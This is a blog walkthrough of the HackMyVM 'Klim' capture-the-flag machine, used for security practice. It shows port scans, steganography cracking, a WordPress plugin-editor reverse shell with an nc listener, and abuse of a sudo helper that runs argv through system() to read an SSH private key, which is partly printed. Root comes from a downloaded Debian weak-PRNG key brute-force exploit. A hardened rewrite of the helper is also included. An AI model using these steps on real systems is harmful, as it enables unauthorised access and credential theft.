Windy's little blog

Odds and ends from everyday life, and I like CTF.

HackMyVm Klim Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Klim


Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100
 Host is up (0.0024s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
 |   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
 |_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Ubuntu Default Page: It works Annex02!
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Directory scan of port 80 finds a WordPress install.

 /index.html           (Status: 200) [Size: 11331]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]


wpscan against /wordpress turns up nothing useful. Manually browsing /wp-content/uploads reveals an image.

 ~ wget http://192.168.56.100/wordpress/wp-content/uploads/2021/07/image.jpg


stegseek recovers the steghide passphrase from the image and extracts a hidden file named dump.

 ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt
 StegSeek version 0.5
 Progress: 10.94% (15259007 bytes)          
 
 [i] --> Found passphrase: "ichliebedich"
 [i] Original filename: "dump"
 [i] Extracting to "image.jpg.out"
 ~ mv image.jpg.out dump


The dump contains a captured WordPress login request; the password is URL-encoded, so decode it first.

 ~ cat dump|grep pwd 
 log=klim&pwd=ss7WhrrnnHOZC%239bQn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.0.26%2Fwordpress%2Fwp-admin%2F&testcookie=1
 ~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
 ss7WhrrnnHOZC#9bQn


Log in to WordPress with these credentials. In the Plugin Editor, edit one of the plugin PHP files and add your PHP reverse-shell code to its source.

Then request that file to trigger the reverse shell.

 ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php 
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:57032.
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Check sudo -l for www-data.

 www-data@klim:/home/klim$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on klim:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on klim:
     (klim) NOPASSWD: /home/klim/tool


Decompile tool and read the source. It builds the string "cat " + argv[1] and hands it to system(), with no validation of the argument at all, so it effectively runs "cat argv[1]" through a shell as klim.

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 
 /* Decompiled /home/klim/tool, with the headers it needs added so it compiles
  * and the decompiler's __cdecl annotation dropped; the stack annotations are
  * the decompiler's own. */
 int main(int argc, const char **argv, const char **envp)
 {
   size_t v3; // rbx
   size_t v4; // rax
   char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
   char *dest; // [rsp+20h] [rbp-20h]
   size_t size; // [rsp+28h] [rbp-18h]
 
   strcpy(s, "cat ");                  // fixed command prefix; argc is never checked
   v3 = strlen(s);
   size = v3 + strlen(argv[1]) + 1;    // room for "cat " + argv[1] + NUL
   dest = (char *)malloc(size);
   strncpy(dest, s, size);
   v4 = strlen(s);
   strncat(dest, argv[1], size - v4);  // argv[1] is appended verbatim, unvalidated
   system(dest);                       // "cat <argv[1]>" is run by /bin/sh as klim
   return 0;
 }
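As an added example (not code from the box or its author), here is how a helper like this could be written so that granting it via sudo does not turn into an arbitrary file read as the target user: the argument count is checked, the path is canonicalised with realpath() and confined to one directory, and the file is opened and copied directly instead of being spliced into a "cat ..." string for system(). ALLOWED_ROOT is an assumption made for the example; the box itself has no such directory.

```c
#define _GNU_SOURCE 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Hardened stand-in for /home/klim/tool (added example). The directory name
 * is an assumption for illustration, not something the box configures. */
#define ALLOWED_ROOT "/home/klim/shared"

/* Return 1 only if `path` exists and canonicalises to a location strictly
 * below `root`. Both sides go through realpath(), so symlinks and ".."
 * are resolved before the prefix comparison and cannot bypass it. */
int path_is_allowed(const char *path, const char *root)
{
    char *rp = realpath(path, NULL);
    char *rr = realpath(root, NULL);
    int ok = 0;
    if (rp && rr) {
        size_t n = strlen(rr);
        /* require the separator so "/home/klim/shared2" does not match */
        ok = strncmp(rp, rr, n) == 0 && rp[n] == '/';
    }
    free(rp);
    free(rr);
    return ok;
}

/* Copy a regular file to `out` without involving a shell. Devices, FIFOs
 * and directories are refused. Returns bytes copied, or -1 on error. */
long cat_file(const char *path, FILE *out)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode)) return -1;
    FILE *in = fopen(path, "rb");
    if (!in) return -1;
    char buf[4096];
    long total = 0;
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, in)) > 0) {
        if (fwrite(buf, 1, n, out) != n) { fclose(in); return -1; }
        total += (long)n;
    }
    fclose(in);
    return total;
}

/* The tool's logic with the original's defects fixed: argc is validated,
 * the path is confined to `root`, and no command string is built.
 * Returns the process exit status (0 ok, 1 refused/failed, 2 usage). */
int tool_main(int argc, char **argv, const char *root)
{
    if (argc != 2) {
        fprintf(stderr, "usage: tool <file under %s>\n", root);
        return 2;
    }
    if (!path_is_allowed(argv[1], root)) {
        fprintf(stderr, "tool: refusing to read %s\n", argv[1]);
        return 1;
    }
    return cat_file(argv[1], stdout) < 0 ? 1 : 0;
}

int main(int argc, char **argv)
{
    return tool_main(argc, argv, ALLOWED_ROOT);
}
```

Even with these fixes, a NOPASSWD sudo rule on a binary that lives in the target user's own home directory is still a weak design: the rule should point at a root-owned path the target user cannot replace.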


Use it to read klim's SSH private key.

 www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
 sudo -u klim ./tool .ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
 ...
 jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
 Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
 49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
 -----END OPENSSH PRIVATE KEY-----
 www-data@klim:/home/klim$


Log in over SSH as klim.

 ~ ssh klim@192.168.56.100 -i id_rsa 
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
 /usr/bin/xauth:  file /home/klim/.Xauthority does not exist
 klim@klim:~$ id
 uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


An id_rsa.pub is left in /opt. Following the author's hint, look for OpenSSL-related exploits:

 ~ searchsploit  openssl                                                                                   ...
 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH                                                                                           | linux/remote/5720.py
 ...
 


Follow the steps in the PoC:

  wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
  tar -jxvf 5622.tar.bz2
  python 5720.py rsa/2048 192.168.56.100 root 22
  Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec
 
 Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
 Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100
 
 Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec


Log in as root with the recovered key.

 ~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
 ...
 root@klim:~# id;hostname              
 uid=0(root) gid=0(root) groupes=0(root)
 klim                                                        




Powered By Z-BlogPHP 1.7.0